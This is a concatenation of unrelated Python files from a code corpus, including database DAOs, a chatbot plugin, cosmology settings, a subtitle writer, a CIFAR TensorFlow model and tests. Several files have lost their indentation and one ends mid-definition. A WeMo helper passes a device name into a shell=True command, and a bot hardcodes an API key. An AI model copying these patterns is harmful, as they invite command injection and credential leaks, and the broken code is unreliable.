in COPY statement: https://www.postgresql.org/docs/current/sql-copy.html
it is necessary that the from clause is reading from STDIN.
example:
sql = COPY <table> (<columns) FROM STDIN with (FORMAT CSV, DELIMITER '|', HEADER);
Parameters:
sql (str): The sql statement should be in the form COPY table '.
data (file-like ): a file-like object to read or write
Returns:
rowcount (int): the number of rows that the last execute*() produced (for DQL statements like SELECT) or affected (for DML statements like UPDATE or INSERT)
References:
https://www.psycopg.org/docs/cursor.html#cursor.copy_from
https://stackoverflow.com/questions/30050097/copy-data-from-csv-to-postgresql-using-python
https://stackoverflow.com/questions/13125236/sqlalchemy-psycopg2-and-postgresql-copy
"""
connection = self.get_db_engine().raw_connection()
try:
            cursor = connection.cursor()
            cursor.copy_expert(sql, data)
            connection.commit()
            # Capture rowcount before closing the cursor.
            rowcount = cursor.rowcount
            cursor.close()
            return rowcount
        except Exception:
            connection.rollback()
            raise
finally:
connection.close()
class AsteroidDao(Dao):
def __init__(self):
super(AsteroidDao, self).__init__()
self.tbl = self.get_table('tno_asteroid')
def get_asteroids_by_names(self, names):
stm = select(self.tbl.c).where(and_(self.tbl.c.name.in_(names)))
rows = self.fetch_all_dict(stm)
return rows
def get_asteroids_by_dynclass(self, dynclass):
stm = select(self.tbl.c).where(and_(self.tbl.c.base_dynclass == dynclass))
rows = self.fetch_all_dict(stm)
return rows
def ccds_by_asteroid(self, asteroid_name):
# des_exposure
de = self.get_table('des_exposure')
# des_ccd
dc = self.get_table('des_ccd')
# Des skybot position
ds = self.get_table('des_skybotposition')
# Skybot Position
sp = self.get_table('skybot_position')
        # WHERE clause filtering by the object name (required).
clause = list([sp.c.name == asteroid_name])
columns = [dc.c.id, de.c.date_obs,
de.c.exptime, dc.c.path, dc.c.filename]
stm = select(columns).\
select_from(
ds.join(
sp, ds.c.position_id == sp.c.id
).join(
dc, ds.c.ccd_id == dc.c.id
).join(
de, ds.c.exposure_id == de.c.id
)
).\
            where(and_(*clause))
rows = self.fetch_all_dict(stm)
return rows
class ObservationDao(Dao):
def __init__(self):
super(ObservationDao, self).__init__()
self.tbl = self.get_table('des_observation')
def delete_by_asteroid_name(self, name):
stm = delete(self.tbl).where(and_(self.tbl.c.name == name))
engine = self.get_db_engine()
with engine.connect() as con:
rows = con.execute(stm)
return rows
class AstrometryJobDao(Dao):
def __init__(self):
super(AstrometryJobDao, self).__init__()
self.tbl = self.get_table('des_astrometryjob')
def get_job_by_id(self, id):
        stm = select(self.tbl.c).where(and_(self.tbl.c.id == int(id)))
return self.fetch_one_dict(stm)
def update_job(self, job):
stm = update(self.tbl).where(and_(self.tbl.c.id == int(job['id']))).values(
status=job['status'],
start=job['start'],
finish=job['end'],
execution_time=datetime.timedelta(seconds=job['exec_time']),
error=job['error'],
traceback=job['traceback'],
)
engine = self.get_db_engine()
with engine.connect() as con:
return con.execute(stm)
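# --- Hedged usage sketch (added for illustration; not part of the original
# module). Shows how import_with_copy_expert can bulk-load an in-memory CSV.
# The column list is an assumption for the example only; only the
# 'tno_asteroid' table and its 'name'/'base_dynclass' columns appear elsewhere
# in this module, and a reachable database from config is assumed.
if __name__ == "__main__":
    import io

    dao = Dao()
    csv_buffer = io.StringIO("name|base_dynclass\nEris|TNO\n")
    copy_sql = (
        "COPY tno_asteroid (name, base_dynclass) "
        "FROM STDIN with (FORMAT CSV, DELIMITER '|', HEADER)"
    )
    # copy_expert streams the buffer through PostgreSQL's COPY, which is far
    # faster than row-by-row INSERTs for large imports.
    imported = dao.import_with_copy_expert(copy_sql, csv_buffer)
    print("Imported %s rows" % imported)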
|
nilq/baby-python
|
python
|
from nonebot import on_command
from nonebot.adapters.cqhttp import Event
import requests
from nonebot.adapters.cqhttp import Bot
from nonebot.rule import to_me
# Matcher for the "星座运势" (horoscope) command; the "city" state key is left
# over from the weather-bot example this handler was adapted from.
horoscope = on_command("星座运势", rule=to_me(), priority=5)
@horoscope.handle()
async def handle_first_receive(bot: Bot, event: Event, state: dict):
    args = str(event.get_message()).strip()  # arguments sent with the command, e.g. "/天气 上海" gives args "上海"
    if args:
        state["city"] = args  # if the user supplied an argument, use it directly
@horoscope.got("city", prompt="你想查询神马星座的运势(@_@)...")
async def handle_city(bot: Bot, event: Event, state: dict):
    city = state["city"]
    horoscope_text = await xin(city)
    await horoscope.finish(horoscope_text)
async def xin(city: str):
    cityname = city
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE'
    }
    url = 'http://web.juhe.cn:8080/constellation/getAll?consName=%s&type=today&key=e5a01b4c805febdb3b47f4d8fee618c3' % str(
        cityname)
    # Note: requests is synchronous, so this call blocks the event loop; an
    # async HTTP client (e.g. httpx or aiohttp) would be more appropriate.
    d = requests.get(url=url, headers=headers).json()
    data = d['summary']
    return data
|
nilq/baby-python
|
python
|
# Here we use the last column of Table 4 of "Planck 2015 Results: XIII. Cosmological Parameters"
_cosmo_params = \
{
'omega_m_0': 0.3089,
'omega_b_0': round(0.0223/0.6774**2, 5),
'omega_l_0': 1. - 0.3089,
'hubble_0': 0.6774,
'helium_by_number': 0.0813,
'helium_by_mass': 0.2453,
'cmb_temp_0': 2.7255,
'sigma_8': 0.8159,
'primordial_index': 0.9667,
'approx_highz': False
}
#'''
# USE THIS ONE FOR TIME SCIENCE PAPER
_hmf_params = \
{
#'hmf_tbl': '/input/hmf_tbl/TimeScience/hmf_ST_wrt_mean_logM_1000_6-16_z_301_0-30.npz',
'hmf_tbl': '/input/hmf_tbl/TimeScience/hmf_Tinker08_wrt_vir_logM_1000_6-16_z_301_0-30.npz',
'hmf_analytic': False,
#'hmf_model': 'ST',
'hmf_model': 'Tinker08',
#'hmf_delta_wrt': 'mean',
'hmf_delta_wrt': 'vir',
'hmf_logMmin': 6.0,
'hmf_logMmax': 16.0,
'hmf_zmin': 0.0,
'hmf_zmax': 30.0,
'hmf_dlogM': 0.01,
'hmf_dz': 0.1,
'hmf_dlna': 2e-6,
'hmf_dlnk': 1e-2,
'hmf_lnk_min': -20.,
'hmf_lnk_max': 10.,
'hmf_transfer_k_per_logint': 11,
'hmf_transfer_kmax': 100., # hmf default value is 5
'hmf_profile_p': 0.3,
'hmf_profile_q': 0.75
}
#'''
'''
# USE THIS ONE FOR MULTI-TRACER PAPER
_hmf_params = \
{
'hmf_tbl': '/input/hmf_tbl/TimeScience/hmf_Tinker08_wrt_vir_logM_1000_6-16_z_301_0-30.npz',
'hmf_analytic': False,
'hmf_model': 'Tinker08',
'hmf_delta_wrt': 'vir',
'hmf_logMmin': 7.0,
'hmf_logMmax': 16.0,
'hmf_zmin': 0.0,
'hmf_zmax': 30.0,
'hmf_dlogM': 0.01,
'hmf_dz': 0.1,
'hmf_dlna': 2e-6,
'hmf_dlnk': 1e-2,
'hmf_lnk_min': -20.,
'hmf_lnk_max': 10.,
'hmf_transfer_k_per_logint': 11,
'hmf_transfer_kmax': 100., # hmf default value is 5
'hmf_profile_p': 0.3,
'hmf_profile_q': 0.75
}
'''
_cibmodel_params = \
{
'cib_model': 'CIB:Cheng',
'cib_L0': [0.0135, 0.02], # Note Heidi has 0.0135, while Yun-Ting has 0.02
'cib_T0': [24.4, 25.3],
'cib_alpha': [0.36, 0.0],
'cib_delta': [3.6, 2.6],
'cib_sigmasq_LM': [0.5, 0.5],
'cib_M_eff': [10**12.6, 10**12.6],
'cib_beta': [1.75, 1.5],
'cib_gamma': [1.7, 2.0],
'cib_zmin': [0.1, 0.1], # minimum z CIB model is valid
'cib_zmax': [10.1, 10.1], # maximum z CIB model is valid
}
_dust_params = \
{
'dust_mw_dg': 0.01,
'dust_sed_nu_ref': 8.57e11,
'dust_sed_emissivity_ref': 4.3e-21,
}
_sensitivity_params = \
{
'sens_t_obs_survey': 1.0e3 * 3600., # default exposure time [s]
'sens_n_feedhorns': 32., # number of feedhorns
'sens_d_ap': 12.0 * 1e2, # effective aperture size (diameter) [cm]
'sens_read_tnoise': True, # whether to read thermal noise from file
'sens_geom_x': 156,
'sens_geom_y': 1,
'sens_geom_z': 42,
'sens_lambda_signal': [1.578e-2], # wavelength of the target (pair of) signal(s); {list}
'sens_sigma_N_HF': 1.0e7,
'sens_sigma_N_LF': 5.0e6,
}
_grf_params = \
{
'grf_d_ap': 12.0 * 1e2, # effective aperture size (diameter) [cm]
'grf_geom_x': 156,
'grf_geom_y': 1,
'grf_geom_z': 42,
'grf_lambda_signal': 1.577e-2, # wavelength of the target (pair of) signal(s); {scalar}
'grf_z_signal': 6.0,
'grf_ps_in': None,
}
_wf_params = \
{
'wf_type': 'analytical',
'wf_z_signal': 6.0,
'wf_n_logkbins': 20,
}
_ham_params = \
{
'uvlf_model': 'bouwens2015',
'dustcorr_method': None, # or 'meurer1999', 'pettini1998', 'capak2015'
'dustcorr_beta': 'bouwens2014',
'dustcorr_scatter_A': 0.,
'dustcorr_scatter_B': 0.34,
'logMh_min': 8.,
'logMh_max': 14.,
'dmag': 0.1,
}
|
nilq/baby-python
|
python
|
import pandas as pd
from config import ROOT_PATH_ABS
class Encoder(object):
def __init__(self, df:pd.DataFrame) -> None:
super().__init__()
self.df = df
self.start_series = [f"{self._format_time(float(fl))}" for fl in self.df.start]
self.end_series = [f"{self._format_time(float(fl))}" for fl in self.df.end]
        try:
            self.texts = self.df.recognized_text
        except AttributeError:
            # Fall back to placeholder text when the column is missing.
            self.texts = ['xxx'] * len(self.start_series)
def _format_time(self, fl):
int_str_part, decimal_str_part = str(fl).split(".")
int_part = int(int_str_part)
decimal_str_part = decimal_str_part[:2]
s = int_part % 60 # seconds
m = (int_part // 60) % 60 # minutes
h = int_part // 3600 # hours
return f"{h}:{m}:{s}.{decimal_str_part}"
class SRTEncoder(Encoder):
def __init__(self, df: pd.DataFrame) -> None:
super().__init__(df)
def _format_time_presentation(self, str_time):
i, f = str_time.split(".")
h, m, s = i.split(":")
h = ("0" + h) if len(h)<2 else h
m = ("0" + m) if len(m)<2 else m
s = ("0" + s) if len(s)<2 else s
while len(f) < 3:
f = f + "0"
formatted_str_time = f"{h}:{m}:{s},{f}"
return formatted_str_time
@property
def event_timestamps(self) -> list:
event_collections = []
for (s, e) in zip(self.start_series, self.end_series):
event_line = f"{self._format_time_presentation(s)} --> {self._format_time_presentation(e)}"
event_collections.append(event_line)
return event_collections
def generate(self, file_name, target_dir=ROOT_PATH_ABS, encoding="utf-8"):
path = f"{target_dir}/{file_name}"
if not "srt" in file_name:
path = path + ".srt"
with open(path, mode="w", encoding=encoding) as f:
for (idx, (timeline, text)) in enumerate(zip(self.event_timestamps, self.texts)):
f.write(str(idx+1))
f.write("\n")
f.write(timeline)
f.write("\n")
f.write(str(text))
f.write("\n")
f.write("\n")
|
nilq/baby-python
|
python
|
import subprocess, logging
logger = logging.getLogger(__name__)
def turn_on_light(device):
if device.enabled:
if not device.status:
cmd = '/usr/local/bin/wemo switch "' + device.name + '" on'
            proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
out, err = proc.communicate()
logger.info(cmd+"-"+str(device.id))
return True
else:
logger.debug('device ' + device.name + '(' + str(device.id) + ') is already on')
else:
logger.warning('device ' + device.name + '(' + str(device.id) + ') not enabled')
return False
def turn_off_light(device):
if device.enabled:
if device.status:
cmd = '/usr/local/bin/wemo switch "' + device.name + '" off'
            proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
out, err = proc.communicate()
logger.info(cmd+"-"+str(device.id))
return True
else:
logger.debug('device ' + device.name + '(' + str(device.id) + ') is already off')
else:
logger.warning('device ' + device.name + '(' + str(device.id) + ') not enabled')
return False
|
nilq/baby-python
|
python
|
from django_assets import env
def layout_workers(request):
workers = []
    for name, bundle in env.get_env()._named_bundles.items():
if name.startswith('worker_'):
name = name.split('_', 1)[1].rsplit('_', 1)[0]
workers.append((name, bundle.urls()[0]))
return {
'layout_workers': workers
}
|
nilq/baby-python
|
python
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The network model"""
__author__ = 'HANEL'
import tensorflow as tf
# Data
Data_PATH = '../../mcifar_data/'
# Network Parameters
n_input = 32 * 32 * 3 # CIFAR input (img shape: 32*32*3)
out_conv_1 = 64
out_conv_2 = 64
n_hidden_1 = 384
n_hidden_2 = 192
dropout = 0.90 # Dropout, probability to keep units
# Global constants describing the CIFAR-10
NUM_CLASSES = 10 # Cifar10 total classes (0-9 digits)
NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN = 40000
NUM_EXAMPLES_PER_EPOCH_FOR_EVAL = 10000
# Constants describing the training process.
NUM_EPOCHS_PER_DECAY = 10.0 # Epochs after which learning rate decays.
LEARNING_RATE_DECAY_FACTOR = 0.60 # Learning rate decay factor.
INITIAL_LEARNING_RATE = 0.001 # Initial learning rate.
FLAGS = tf.app.flags.FLAGS
# Create model
def conv2d(img, w, b):
return tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(img, w, strides=[1, 1, 1, 1], padding='SAME'), b))
def max_pool(img, k):
return tf.nn.max_pool(img, ksize=[1, k, k, 1], strides=[1, k, k, 1], padding='SAME')
def inference(images):
"""Build the CIFAR model up to where it may be used for inference.
Args:
Returns:
logits: Output tensor with the computed logits.
"""
  # Reshape input picture
print('In Inference ', images.get_shape(), type(images))
images = tf.reshape(images, shape=[-1, 32, 32, 3])
_dropout = tf.Variable(dropout) # dropout (keep probability)
# Store layers weight & bias
_weights = {
    'wc1': tf.Variable(tf.random_normal([5, 5, 3, out_conv_1], stddev=1e-3)), # 5x5 conv, 3 inputs, 64 outputs
'wc2': tf.Variable(tf.random_normal([5, 5, out_conv_1, out_conv_2], stddev=1e-3)),
# 5x5 conv, 64 inputs, 64 outputs
'wd1': tf.Variable(tf.random_normal([out_conv_2 * 8 * 8, n_hidden_1], stddev=1e-3)),
'wd2': tf.Variable(tf.random_normal([n_hidden_1, n_hidden_2], stddev=1e-3)),
'out': tf.Variable(tf.random_normal([n_hidden_2, NUM_CLASSES], stddev=1e-3))
}
_biases = {
'bc1': tf.Variable(tf.random_normal([out_conv_1])),
'bc2': tf.Variable(tf.random_normal([out_conv_2])),
'bd1': tf.Variable(tf.random_normal([n_hidden_1])),
'bd2': tf.Variable(tf.random_normal([n_hidden_2])),
'out': tf.Variable(tf.random_normal([NUM_CLASSES]))
}
# Convolution Layer 1
with tf.name_scope('Conv1'):
conv1 = conv2d(images, _weights['wc1'], _biases['bc1'])
# Max Pooling (down-sampling)
conv1 = max_pool(conv1, k=2)
# norm1
conv1 = tf.nn.lrn(conv1, 4, bias=1.0, alpha=0.001 / 9.0, beta=0.75,
name='norm1')
# Apply Dropout
conv1 = tf.nn.dropout(conv1, _dropout)
# Convolution Layer 2
with tf.name_scope('Conv2'):
conv2 = conv2d(conv1, _weights['wc2'], _biases['bc2'])
# norm2
conv2 = tf.nn.lrn(conv2, 4, bias=1.0, alpha=0.001 / 9.0, beta=0.75,
name='norm2')
# # Max Pooling (down-sampling)
conv2 = max_pool(conv2, k=2)
# Apply Dropout
conv2 = tf.nn.dropout(conv2, _dropout)
# Fully connected layer 1
with tf.name_scope('Dense1'):
dense1 = tf.reshape(conv2,
                        [-1, _weights['wd1'].get_shape().as_list()[0]]) # Reshape conv2 output to fit dense layer input
dense1 = tf.nn.relu_layer(dense1, _weights['wd1'], _biases['bd1']) # Relu activation
dense1 = tf.nn.dropout(dense1, _dropout) # Apply Dropout
# Fully connected layer 2
with tf.name_scope('Dense2'):
dense2 = tf.nn.relu_layer(dense1, _weights['wd2'], _biases['bd2']) # Relu activation
# Output, class prediction
logits = tf.add(tf.matmul(dense2, _weights['out']), _biases['out'])
return logits
def loss(logits, labels):
"""Add L2Loss to all the trainable variables.
  Add summary for "Loss" and "Loss/avg".
Args:
logits: Logits from inference().
labels: Labels from distorted_inputs or inputs(). 1-D tensor
of shape [batch_size]
Returns:
Loss tensor of type float.
"""
# Reshape the labels into a dense Tensor of
# shape [batch_size, NUM_CLASSES].
sparse_labels = tf.reshape(labels, [FLAGS.batch_size, 1])
indices = tf.reshape(tf.range(0, FLAGS.batch_size), [FLAGS.batch_size, 1])
concated = tf.concat(1, [indices, sparse_labels])
dense_labels = tf.sparse_to_dense(concated,
[FLAGS.batch_size, NUM_CLASSES],
1.0, 0.0)
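  # Illustration (added comment): for batch_size=3 and labels [2, 0, 9],
  # dense_labels is a 3x10 one-hot matrix with 1.0 at columns 2, 0 and 9 of
  # rows 0, 1 and 2 respectively, and 0.0 elsewhere.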
# Calculate the average cross entropy loss across the batch.
cross_entropy = tf.nn.softmax_cross_entropy_with_logits(
logits, dense_labels, name='cross_entropy_per_example')
cross_entropy_mean = tf.reduce_mean(cross_entropy, name='cross_entropy')
tf.add_to_collection('losses', cross_entropy_mean)
# The total loss is defined as the cross entropy loss plus all of the weight
# decay terms (L2 loss).
return tf.add_n(tf.get_collection('losses'), name='total_loss')
def training(loss, global_step):
"""Sets up the training Ops.
Creates a summarizer to track the loss over time in TensorBoard.
Creates an optimizer and applies the gradients to all trainable variables.
The Op returned by this function is what must be passed to the
`sess.run()` call to cause the model to train.
Args:
loss: Loss tensor, from loss().
learning_rate: The learning rate to use for gradient descent.
Returns:
train_op: The Op for training.
"""
# Variables that affect learning rate.
num_batches_per_epoch = NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN / FLAGS.batch_size
decay_steps = int(num_batches_per_epoch * NUM_EPOCHS_PER_DECAY)
print('Decay steps is: ', decay_steps)
# Decay the learning rate exponentially based on the number of steps.
lr = tf.train.exponential_decay(INITIAL_LEARNING_RATE,
global_step,
decay_steps,
LEARNING_RATE_DECAY_FACTOR,
staircase=True)
tf.scalar_summary('learning_rate', lr)
# Add a scalar summary for the snapshot loss.
tf.scalar_summary(loss.op.name, loss)
# Create the adam or gradient descent optimizer with the given learning rate.
optimizer = tf.train.AdamOptimizer(lr)
# optimizer = tf.train.GradientDescentOptimizer(lr)
# Use the optimizer to apply the gradients that minimize the loss
# (and also increment the global step counter) as a single training step.
train_op = optimizer.minimize(loss, global_step=global_step)
return train_op
def evaluation(logits, labels):
"""Evaluate the quality of the logits at predicting the label.
Args:
logits: Logits tensor, float - [batch_size, NUM_CLASSES].
labels: Labels tensor, int32 - [batch_size], with values in the
range [0, NUM_CLASSES).
  Returns:
    The accuracy as a percentage, and a scalar tensor with the number of
    examples (out of batch_size) that were predicted correctly.
  """
print('Evaluation..')
# For a classifier model, we can use the in_top_k Op.
# It returns a bool tensor with shape [batch_size] that is true for
  # the examples where the label was in the top k (here k=1)
# of all logits for that example.
correct = tf.nn.in_top_k(logits, labels, 1)
num_correct = tf.reduce_sum(tf.cast(correct, tf.float32))
acc_percent = num_correct / FLAGS.batch_size
# Return the number of true entries.
return acc_percent * 100.0, num_correct
def main(argv=None):
return 0
if __name__ == '__main__':
tf.app.run()
|
nilq/baby-python
|
python
|
# ------------------------------------------------------------------------------
# CodeHawk Binary Analyzer
# Author: Henny Sipma
# ------------------------------------------------------------------------------
# The MIT License (MIT)
#
# Copyright (c) 2016-2020 Kestrel Technology LLC
# Copyright (c) 2020 Henny Sipma
# Copyright (c) 2021 Aarno Labs LLC
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ------------------------------------------------------------------------------
from typing import Optional, TYPE_CHECKING
import chb.util.fileutil as UF
if TYPE_CHECKING:
import chb.invariants.XXpr
class InputConstraintValue:
def __init__(self) -> None:
pass
@property
def is_env_value(self) -> bool:
return False
@property
def is_string_suffix_value(self) -> bool:
return False
@property
def is_command_line_argument(self) -> bool:
return False
@property
def is_constraint_value_expr(self) -> bool:
return False
@property
def is_function_argument_value(self) -> bool:
return False
class EnvironmentInputValue(InputConstraintValue):
def __init__(self, name: str) -> None:
InputConstraintValue.__init__(self)
self._name = name
@property
def name(self) -> str:
return self._name
@property
def is_env_value(self) -> bool:
return True
def __str__(self) -> str:
return "env(" + self.name + ")"
class StringSuffixValue(InputConstraintValue):
def __init__(
self,
stringexpr: InputConstraintValue,
charcode: str,
lastpos: bool = False):
InputConstraintValue.__init__(self)
self._stringexpr = stringexpr
self._charcode = charcode
self._lastpos = lastpos
@property
def stringexpr(self) -> InputConstraintValue:
return self._stringexpr
@property
def charcode(self) -> str:
return self._charcode
@property
def is_last_position(self) -> bool:
return self._lastpos
@property
def is_string_suffix_value(self) -> bool:
return True
def __str__(self) -> str:
pos = 'lastpos' if self.is_last_position else 'pos'
return ("suffix("
+ str(self.stringexpr)
+ ','
+ pos
+ '('
+ self.charcode
+ '))')
class FunctionArgumentValue(InputConstraintValue):
def __init__(self, argindex: int) -> None:
InputConstraintValue.__init__(self)
self._argindex = argindex
@property
def argindex(self) -> int:
return self._argindex
@property
def is_function_argument_value(self) -> bool:
return True
def __str__(self) -> str:
return "function-arg(" + str(self.argindex) + ")"
class CommandLineArgument(InputConstraintValue):
def __init__(self, argindex: int) -> None:
InputConstraintValue.__init__(self)
self._argindex = argindex
@property
def argindex(self) -> int:
return self._argindex
@property
def is_command_line_argument(self) -> bool:
return True
def __str__(self) -> str:
return 'cmdline-arg(' + str(self.argindex) + ')'
class InputConstraintValueExpr(InputConstraintValue):
def __init__(self,
op: str,
x: InputConstraintValue,
y: str):
InputConstraintValue.__init__(self)
self._op = op
self._x = x
self._y = y
@property
def operator(self) -> str:
return self._op
@property
def arg1(self) -> InputConstraintValue:
return self._x
@property
def arg2(self) -> str:
return self._y
@property
def is_constraint_value_expr(self) -> bool:
return True
def __str__(self) -> str:
return str(self.arg1) + self.operator + str(self.arg2)
|
nilq/baby-python
|
python
|
# Generated by Django 4.0 on 2022-01-02 13:31
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('leads', '0005_auto_20220102_1420'),
]
operations = [
migrations.AlterField(
model_name='agent',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='category',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='lead',
name='category',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='leads', to='leads.category'),
),
migrations.AlterField(
model_name='lead',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='user',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='userprofile',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
]
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
import sys
import netsnmp
if __name__ == '__main__':
ip = '127.0.0.1'
snmp = netsnmp.SNMPSession(ip, 'RJKJ')
if snmp.is_alive():
snmp.close()
        print('test import netsnmp ok')
|
nilq/baby-python
|
python
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project
# root for license information.
from redact.types.file_bundle import FileBundle
from redact.types.file_bundle import FileType
class TestFileBundle:
def test_from_names(self) -> None:
names = [
"a.jpg",
"a.jpg.labels.json",
"dummy_file.jpg",
"a.jpg.ocr.json"]
expected = [FileBundle(
image_file_name="a.jpg",
fott_file_name="a.jpg.labels.json",
ocr_file_name="a.jpg.ocr.json")]
actual = FileBundle.from_names(names, FileType.IMAGE_ONLY)
assert actual == expected
def test_from_names_pdf(self) -> None:
names = [
"a.pdf",
"a.pdf.labels.json",
"dummy_file.jpg",
"a.jpg",
"a.jpg.labels.json",
"dummy_file.pdf",
"a.pdf.ocr.json"]
expected = [FileBundle(
image_file_name="a.pdf",
fott_file_name="a.pdf.labels.json",
ocr_file_name="a.pdf.ocr.json")]
actual = FileBundle.from_names(names, FileType.PDF_ONLY)
assert actual == expected
|
nilq/baby-python
|
python
|
"""
Copyright (C) 2017-2018 University of Massachusetts Amherst.
This file is part of "learned-string-alignments"
http://github.com/iesl/learned-string-alignments
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sys
import os
if __name__ == "__main__":
test_dir = sys.argv[1]
num_partitions = sys.argv[2]
test_prediction_filename = os.path.join(test_dir, "test.predictions")
with open(test_prediction_filename, 'w+') as f_out:
total_lines = 0
for i in range(int(num_partitions)):
            partition_prediction_filename = os.path.join(test_dir, "partition_{}".format(str(i)), "current.test.txt")
            if(os.path.exists(partition_prediction_filename)):
                with open(partition_prediction_filename, 'r') as f_in:
all_lines = f_in.readlines()
total_lines += len(all_lines)
for line in all_lines:
if("input prediction goldOutput" not in line):
f_out.write(line)
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3.9
# Modules
import os
import sprint
import colorama
import platform
from os.path import isfile, expanduser
# Credit message
colorama.init() # Fix windows colors
print(sprint.colored(f"Sprint v{sprint.__version__} by iiPython", "yellow"))
print(sprint.colored(f"Python version {platform.python_version()}, running on {platform.system()}", "yellow"))
print()
# Command grabber
def get_command(indent = 0):
# Set our path
path = os.getcwd()
path = path.replace(os.getenv("HOME", expanduser("~")), "~")
# Fetch our command
command = input(sprint.colored(f"{path} >>> {' ' * indent}", "green"))
# Multi-line support
if command.endswith("\\"):
command = command[:-1]
command = command + get_command(indent = indent + 2)
# Return
return command
# Main loop
parser = sprint.SprintParser()
while True:
# Execute command
try:
cmd = get_command()
except KeyboardInterrupt:
print() # Stop weird line break issues
continue
# Support for running files
if isfile(cmd):
# Load our lines
try:
raw_lines = open(cmd, "r").read().split("\n")
except PermissionError:
print(sprint.colored("Missing permissions to read from file.", "red"))
continue
# Check for sprint
if raw_lines[0] == ";sprint-file":
# Remove all whitespace BEFORE parsing
no_whitespaced_lines = []
for line in raw_lines:
# Ignore blank lines
line = parser.remove_whitespace(line)
if not line:
continue
# Append this to our line data
no_whitespaced_lines.append(line)
# Parse the file
multiline = False
complete_line = None
line_index = 0
lines = []
for line in no_whitespaced_lines:
# Ignore blank lines
line = parser.remove_whitespace(line)
if not line:
continue
# Check if this declares another line
if line.endswith("\\") and not multiline:
multiline = True
complete_line = line[:-1]
elif multiline:
                    # Check if this isn't really a multi-line
if not no_whitespaced_lines[line_index - 1].endswith("\\"):
multiline = False
# Remove the backslash (if exists)
if line.endswith("\\"):
line = line[:-1]
# Joining together
if multiline:
complete_line += " " + line
else:
# Check for our other line
if complete_line != "":
lines.append(complete_line)
lines.append(line)
# Reset our completed line
complete_line = ""
else:
lines.append(line)
# Increase our index
line_index += 1
# Execute our lines
for line in lines:
parser.execute(line)
# Make sure to not execute the filename as a command
continue
# Run our command
parser.execute(cmd)
|
nilq/baby-python
|
python
|
"""Test categoricalCNNPolicy in PyTorch."""
import cloudpickle
import pytest
import torch
from garage.envs import GymEnv
from garage.torch import TransposeImage
from garage.torch.policies import CategoricalCNNPolicy
from tests.fixtures.envs.dummy import DummyDictEnv, DummyDiscretePixelEnv
class TestCategoricalCNNPolicy:
def _initialize_obs_env(self, env):
"""Initialize observation env depends on observation space type.
If observation space (i.e. akro.Image, gym.spaces.Box) is an image,
wrap the input of shape (W, H, 3) for PyTorch (N, 3, W, H).
Return:
Transformed environment (garage.envs).
"""
obs_shape = env.observation_space.shape
if len(obs_shape) == 3 and obs_shape[2] in [1, 3]:
env = TransposeImage(env)
return env
@pytest.mark.parametrize(
'hidden_channels, kernel_sizes, strides, hidden_sizes', [
((3, ), (3, ), (1, ), (4, )),
((3, 3), (3, 3), (1, 1), (4, 4)),
((3, 3), (3, 3), (2, 2), (4, 4)),
])
def test_get_action(self, hidden_channels, kernel_sizes, strides,
hidden_sizes):
"""Test get_action function."""
env = GymEnv(DummyDiscretePixelEnv(), is_image=True)
env = self._initialize_obs_env(env)
policy = CategoricalCNNPolicy(env=env,
kernel_sizes=kernel_sizes,
hidden_channels=hidden_channels,
strides=strides,
hidden_sizes=hidden_sizes)
env.reset()
obs = env.step(1).observation
action, _ = policy.get_action(obs)
assert env.action_space.contains(action)
@pytest.mark.parametrize(
'hidden_channels, kernel_sizes, strides, hidden_sizes', [
((3, ), (3, ), (1, ), (4, )),
((3, 3), (3, 3), (1, 1), (4, 4)),
((3, 3), (3, 3), (2, 2), (4, 4)),
])
